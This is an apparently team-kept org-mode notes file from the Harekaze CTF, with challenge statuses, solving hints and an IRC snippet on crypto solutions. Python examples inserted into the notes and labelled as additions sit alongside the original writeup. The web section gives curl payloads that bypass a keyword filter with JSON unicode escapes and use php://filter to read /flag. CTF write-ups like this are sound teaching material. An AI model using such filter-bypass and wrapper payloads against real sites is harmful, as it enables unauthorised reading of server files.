* DONE Welcome [Misc 10]
Solved: wasamasa
- Copy and paste that flag!
* DONE scramble [Reversing 100]
Solved: Oblivion
- ELF binary messing around with program memory
- It decompiles in Ghidra, but it's all gibberish
- Oblivion solved it with some code
* DONE ONCE UPON A TIME [Crypto 100]
Solved: WTFH4X
- Cryptosystem doing matrix multiplication with some randomization
- Given the length of the output, there are four possible ways it has been created (since it's two parts and randomization allows each to happen two ways)
- I have no idea how to solve linear algebra problems :(
* DONE Baby ROP [Pwn 100]
Solved: semchapeu
* TODO The Steganography Generator [Reversing 200]
- Decompiles cleanly
- The Java code mutates certain pixels of the image
- It uses a bytestream composed of some magic bytes followed by the flag
* DONE Twenty-five [Crypto 100]
Solved: wasamasa
- Goal: Translate crypto.txt to valid perl code
- I did forego frequency analysis and instead looked for unusual/unique words among the reserved keywords list
- =qq= is a good start, from then on one can guess =qx= and continue until figuring out all letters
- Searching reserved.txt for patterns like =^a..b$= is the way
- Change the code to =print($text);= to see your progress and comment out =eval($text);=
- Evaluating the fully translated code will print the flag
* DONE Encode & Encode [Web 100]
Solved: wasamasa
- The key insight here is that the check is done before JSON decoding
- So, you can enter something not matching the filter, but which decodes into something exfiltrating the flag
- A second bypass is required, for this you can use the same trick to invoke a PHP wrapper that filters output
- I picked =php://filter= to ROT13-encode the flag on its way out...
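The pre-decode check described above, next to the decode-then-validate order that closes the hole, as an added Python example (not the challenge's PHP source, which is not on the page); the deny-list is assumed, and the request bodies are constructed, the last one being the writeup's own final curl payload.

```python
import json

# Assumed deny-list: the real filter is not on the page, but the writeup's payloads
# escape "flag" and the colon in "php:", so both words are modelled here.
FORBIDDEN = ("flag", "php:")


def vulnerable_page(raw_body: str):
    """Filter applied to the raw JSON text, then decoded: the order the writeup exploits.
    Returns the page value the handler would go on to read, or None if blocked."""
    if any(word in raw_body for word in FORBIDDEN):
        return None
    return json.loads(raw_body)["page"]


def hardened_page(raw_body: str):
    """Decode first, then validate the decoded value; additionally reject stream
    wrappers and absolute or traversing paths rather than relying on a word list."""
    page = json.loads(raw_body)["page"]
    if any(word in page.lower() for word in FORBIDDEN):
        return None
    if "://" in page or page.startswith("/") or ".." in page.split("/"):
        return None
    return page


# Constructed request bodies; ESCAPED_FLAG is the writeup's final curl payload.
PLAIN_FLAG = '{"page": "/flag"}'
ESCAPED_FLAG = r'{"page": "php\u003a//filter/read=string.rot13/resource=/\u0066lag"}'
INDEX = '{"page": "./index.html"}'
```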
#+BEGIN_SRC shell-script
curl -i -H 'Content-Type: application/json' --data '{"page": "./index.html "}' http://problem.harekaze.com:10001/query.php
curl -i -H 'Content-Type: application/json' --data '{"page": "/flag"}' http://problem.harekaze.com:10001/query.php
curl -i -H 'Content-Type: application/json' --data '{"page": "/\u0066lag"}' http://problem.harekaze.com:10001/query.php
curl -i -H 'Content-Type: application/json' --data '{"page": "php\u003a//filter/read=string.rot13/resource=/\u0066lag"}' http://problem.harekaze.com:10001/query.php
#+END_SRC
* DONE Baby ROP 2 [Pwn 200]
Solved: semchapeu
* TODO show me your private key [Crypto 200]
- I don't understand ECC at all
- I should learn some sagemath
* TODO Admin's Product key [Reversing 200]
- No clue
* TODO Login System [Pwn 200]
- semchapeu is taking this one on
* TODO Easy Notes [Web 200]
- Lots of carefully written PHP
- No obvious way to change the session contents
- I've tried to leak the environment variables instead, no luck either
- Maybe it's =$type=?
* DONE [a-z().] [Misc 200]
Solved: WTFH4X
- This one's terrible
- 1337 is 7*191
- You can obtain numbers by using =length= on an array or string
- You can obtain properties without uppercase letters
- You can call functions with 0 or 1 arguments
- I got some numbers out of this, but nothing close
- Crazy idea: Obtain running time and hope it matches eventually
- Crazy idea: Reverse DNS on a numerically represented IP address
- Neither will work because the VM namespace is seriously limited
- There are some top-level functions with short names like =console.log.name=
- Candidates can be obtained by pressing the tab key twice inside a =node= REPL and testing against the VM
- You can build an algebra by using =concat= on strings and =repeat= on lengths
- This together with a short enough primitive for 8 and 7 gives you the following term: 7*((8+8+7)*8+7)
* DONE Now We Can Play!! [Crypto 200]
Solved: WTFH4X
- Some funky crypto exchange
* TODO One Quadrillion [Crypto 200]
- Some unreadable hashing function
* TODO Harekaze Note [Pwn 300]
- semchapeu is taking this one on
* DONE Avatar Uploader 1 [Misc 100]
Solved: wasamasa
- The flag can be obtained by triggering an error path in the uploader
- It looks as if you just need a mangled PNG file
- This code gives you the flag:
#+BEGIN_SRC shell-script
convert xc:red -size 1x1 1x1.png
head -c20 1x1.png > broken.png
#+END_SRC
* TODO Avatar Uploader 2 [Web 300]
- The flag is in the file system, so some exfiltration is required
* TODO Ramen [Pwn 400]
- I'll let semchapeu deal with this
* TODO SQLite Voting [Web 350]
- SQL injection, but not as we know it
- The most severe restriction is no whitespace, followed by none of the usual characters
- You only get a binary response back
* Other
08:22 < WTFH4X> once upon a time:
08:22 < wasa> you can write it into a file
08:23 < WTFH4X> takenoko is just matrix multiplication % 251 -> so multiply encrypted flag by modular inverse of m2
08:23 < WTFH4X> from left side and from right side, take the one that gives printable flag
08:24 < WTFH4X> now we can play:
08:24 < WTFH4X> pass c1, c2 back to the server
08:25 < WTFH4X> you get back: pow(3, randint(2**16, 2**17), p) * flag % p
08:25 < WTFH4X> just brute all values of that random
08:26 < WTFH4X> for i in xrange(2**16, 2**17): x = c * inverse(pow(3, i, p), p) % p; if is_printable(x): print(x)
08:26 < WTFH4X> smth like that
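The recovery step WTFH4X sketches for ONCE UPON A TIME (invert m2 modulo 251, multiply the ciphertext matrix by it from the left and from the right, keep the candidate that is printable), as an added Python example that is not part of the original notes or the challenge's code; the 2x2 key matrix, the plaintext and the matrix size are constructed here because the challenge's real values are not on the page.

```python
P_MOD = 251  # the modulus the chat names for the takenoko cryptosystem


def mat_inv_mod(m, p):
    """Gauss-Jordan inversion of a square matrix over the integers mod p."""
    n = len(m)
    a = [row[:] + [int(i == j) for j in range(n)] for i, row in enumerate(m)]
    for col in range(n):
        pivot = next((r for r in range(col, n) if a[r][col] % p), None)
        if pivot is None:
            raise ValueError("matrix is not invertible mod p")
        a[col], a[pivot] = a[pivot], a[col]
        inv = pow(a[col][col], -1, p)
        a[col] = [x * inv % p for x in a[col]]
        for r in range(n):
            if r != col and a[r][col]:
                f = a[r][col]
                a[r] = [(x - f * y) % p for x, y in zip(a[r], a[col])]
    return [row[n:] for row in a]


def mat_mul_mod(a, b, p):
    return [[sum(x * y for x, y in zip(row, col)) % p for col in zip(*b)] for row in a]


def is_printable(m):
    return all(32 <= v < 127 for row in m for v in row)


def recover(c, m2, p=P_MOD):
    """Try both orders of multiplication, since the page says the ordering is
    randomised, and return only the candidates that decode to printable bytes."""
    inv = mat_inv_mod(m2, p)
    left = mat_mul_mod(inv, c, p)   # undoes C = M2 * P
    right = mat_mul_mod(c, inv, p)  # undoes C = P * M2
    return [cand for cand in (left, right) if is_printable(cand)]


# Constructed key and plaintext; det(KEY) = 5, which is invertible mod 251.
KEY = [[2, 3], [1, 4]]
PLAIN = [[ord(ch) for ch in "fl"], [ord(ch) for ch in "ag"]]
CIPHER = mat_mul_mod(KEY, PLAIN, P_MOD)  # the challenge would hand us this
```

Here only the left product is printable, so `recover` returns exactly one candidate; in the challenge, the candidate that reads as a flag is the one to keep.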